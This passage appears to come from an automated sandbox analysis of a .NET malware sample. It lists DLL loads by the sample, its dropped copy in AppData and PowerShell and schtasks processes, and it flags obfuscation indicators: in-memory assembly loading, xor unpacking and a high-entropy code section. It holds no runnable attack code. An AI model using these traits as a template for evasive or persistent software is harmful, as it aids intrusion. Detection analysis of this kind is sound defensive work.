                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: PZNfhfaj9O.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: PZNfhfaj9O.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: PZNfhfaj9O.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: ACRONG~1.TXTntkrnlmp.pdbxx, source: CiENBY.exe, 00000012.00000002.2078146941.0000000000A11000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: CiENBY.exe, 00000012.00000002.2078146941.0000000000A11000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: DQOrL.pdbSHA256 source: PZNfhfaj9O.exe, CiENBY.exe.0.dr
                    Source: Binary string: DQOrL.pdb source: PZNfhfaj9O.exe, CiENBY.exe.0.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: PZNfhfaj9O.exe, frmInicioSesion.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: PZNfhfaj9O.exe, frmInicioSesion.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: CiENBY.exe.0.dr, frmInicioSesion.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: CiENBY.exe.0.dr, frmInicioSesion.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, RxRdm1nit3hOoWDSgZ.cs.Net Code: jfKRJHN6kuoL3ElIVaq System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, RxRdm1nit3hOoWDSgZ.cs.Net Code: jfKRJHN6kuoL3ElIVaq System.Reflection.Assembly.Load(byte[])
                    Source: PZNfhfaj9O.exeStatic PE information: 0xDCB7B960 [Tue May 6 02:54:24 2087 UTC]
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_02CD47B9 push ebp; iretd 0_2_02CD481D
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_02CDEF30 push eax; iretd 0_2_02CDEF31
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_0766B614 pushad ; ret 0_2_0766B61E
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_0766E5E8 push eax; ret 0_2_0766E5E9
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_076683F5 push ecx; ret 0_2_076683F6
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_07669387 push esp; ret 0_2_07669396
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_07669398 push edx; ret 0_2_07669646
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_07667E7A push eax; ret 0_2_07667E7C
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_07667E9C push ecx; ret 0_2_07667E9D
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_07663CFB push ecx; ret 0_2_07663D0A
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_07663C8B push eax; ret 0_2_07663C9A
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 0_2_07669A33 pushad ; ret 0_2_07669A52
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeCode function: 9_2_067DE5DF push es; ret 9_2_067DE5E0
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_02C847B9 push ebp; retf 11_2_02C8481D
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeCode function: 11_2_02C8EF30 push eax; iretd 11_2_02C8EF31
                    Source: PZNfhfaj9O.exeStatic PE information: section name: .text entropy: 7.85886818157661
                    Source: CiENBY.exe.0.drStatic PE information: section name: .text entropy: 7.85886818157661
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, Bt0JDrciGx8bOf6Gm7A.csHigh entropy of concatenated method names: 'Opo6prByIl', 'LHc6L7CQDs', 'uTb6Kh8aGR', 'bAr6k4UMYH', 'wZq65mvAsh', 'IEt6ietEwL', 'BH86U8t9bA', 'XBP6v2U2pq', 'xHk63QEFRN', 'TRd6hZnEdo'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, eBxsY6Wh4pPqmZqpGG.csHigh entropy of concatenated method names: 'ToString', 'MZnSfNWdrl', 'OCWSQmq0fc', 'I5IS2ZL0Nk', 'stmSqk0eCr', 'qi4SyFd4xA', 'V3wSbLXg9N', 'T1kSnGAvAd', 'xaGSEFSjCi', 'w3dSjmELuH'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, v3l6KkE5jZbMdGFeYH.csHigh entropy of concatenated method names: 'bgUs7glEV8', 'djFsCHmP12', 'tfKsGKZAnc', 'RBUsd1847s', 'HtTsaICYYW', 'qkOsxkMAgZ', 'UxvsMYoTny', 'rxbsHKSUkL', 'sU7scKfQF8', 'yPwstt41f2'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, oVjhAVDiN44n9Uqc01.csHigh entropy of concatenated method names: 'cwExp5F1Hr', 'QmJxLUwSNu', 'xo9xKyKxt4', 'U29xk06xfF', 'bKKx5QfLXV', 'gW1xiv3Oh7', 'LWRxUHX3rr', 'ULWxv3UxCe', 'hZCx3IZAP4', 'corxhUYna7'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, yEpUT0HkruT90xjmDp.csHigh entropy of concatenated method names: 'qnvGkIvQot', 'klRGiEv130', 'xc0Gvfh0VQ', 'zQLG3TXpdE', 'v0fG0pnGCX', 'QO1GSmM43V', 'fDHGJYEehX', 'TntGskRS9j', 'yKmG6BsJyR', 'PuvGolbXZ6'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, uBcaQU3fuM2aVBcP0B.csHigh entropy of concatenated method names: 'b8Aae6n9Zl', 'jupaCmonoE', 'TacadTqgoe', 'TZkaxpFQTK', 'yCyaMopgPJ', 'YSjd8EssIH', 'Iu9dYj6xRn', 'dvKdBCws0W', 'eG4dVsESqt', 'DcGdFRLvbM'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, RxRdm1nit3hOoWDSgZ.csHigh entropy of concatenated method names: 'k5XleAjn0m', 'wAQl7VNo8q', 'pA9lCQc3xp', 'xuOlG930nP', 'ufxld91rj6', 'IeolaLaucm', 'Xvglx3ehgi', 'TZxlMLsyr4', 'FyolHYcFh2', 'fbolcOlMh5'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, IWZuYAFNkfiXEhFshY.csHigh entropy of concatenated method names: 'is7x7cQPAB', 'fOixGuchRe', 'H3exafmXBs', 'PGvaNuAXov', 'c98azHF9sQ', 'TRkxANutrW', 'yljxIxovCG', 'XtFxTVbn4E', 'XcNxljGuMV', 'bOMxDR91N3'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, hnewMPvAJJw2EghmA3.csHigh entropy of concatenated method names: 'gQ4JVMVJ86', 'Kv0JNvQkQ6', 'lessAL4Z0Z', 'kimsI1HZLk', 'QjjJfAiiZE', 'A89JRrSd7B', 'GPlJO6TZLb', 'NqpJmn8SMA', 'CbbJrgU3Ck', 'b5ZJP2rB0e'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, iIf93pzKqqDDVRUiYX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sAR6956J6j', 'GJP60aOKrd', 'Kmf6SSamwp', 'J6j6JY8OAd', 'R3V6sZXurP', 'kHY66KAJoF', 'G5f6o9PjIe'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, SNtb1GhBB6b7imWkm3.csHigh entropy of concatenated method names: 'Csqs1s9ScN', 'tqvsQK7dSi', 'rrqs2jbTa1', 'GR1sqr18JI', 'lkLsmHH4Ix', 'aNYsyA5v9W', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, cwi7vI4dtyq5xIeGKR.csHigh entropy of concatenated method names: 'Qcp9vLnTVZ', 'VNi93qmm9O', 'YNO91KaVZx', 'xnx9Qwyq5M', 'FZO9qwt4mM', 'cbg9yfs6el', 'IQN9n6tdfR', 'FCI9ErsSwd', 'Ro89X7W3kC', 'Swh9fAeNp0'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, jXtKLEM4uNuPOdIWlC.csHigh entropy of concatenated method names: 'myed5oFu5j', 'rpCdUpicRA', 'zSEG2HZWfm', 'XDcGqFxwJ7', 'AS4GyLsJbw', 'UMPGbmKmGX', 'KJNGnXXxq1', 'Cl5GEhjih1', 'klLGjE2LPg', 'QerGXacTbH'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, fxlHQyZ72bmm0p70X2.csHigh entropy of concatenated method names: 'rnN6Iyo3DN', 'Cja6lES52X', 'XZV6Dvkr3g', 'acx67yU3OD', 'a1I6C69I15', 'RN76dKd4rr', 'EjN6ahjEaO', 'mNisBgQhGc', 'uplsVyJpQK', 'vdasFUoJCI'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, fodRRAQatCMpctZLl5.csHigh entropy of concatenated method names: 'WtG0XVHTUt', 'bKR0RclCxQ', 'ulu0mQUPA2', 'DK80rRjwyb', 'joT0QTvlnA', 'CEX02uctKc', 'f140qG6Gfk', 'l7j0yamZVH', 'cDh0b77tDY', 'tCp0n2i4p1'
